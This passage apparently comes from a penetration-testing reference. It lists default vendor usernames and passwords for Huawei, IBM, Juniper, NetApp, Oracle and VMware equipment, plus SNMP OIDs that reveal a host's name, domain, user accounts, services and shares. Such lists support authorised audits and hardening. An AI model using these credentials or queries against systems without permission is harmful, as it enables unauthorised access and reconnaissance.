Huawei admin, root 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM USERID, admin, manager, mqm, db2inst1, db2fenc1, dbusr1, db2admin, iadmin, system, device, ufmcli, customer PASSWORD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper netscreen netscreen
NetApp admin netapp123
Oracle root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user changme, ilom-admin, ilom-operator, welcome1, oracle
VMware vi-admin, root, hqadmin, vmware, admin vmware, vmw@re, hqadmin, default

SNMP OID values

OID Value
.1.3.6.1.2.1.1.5 Hostname
.1.3.6.1.4.1.77.4.2 Domain name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running services
.1.3.6.1.4.1.77.1.2.27 Share information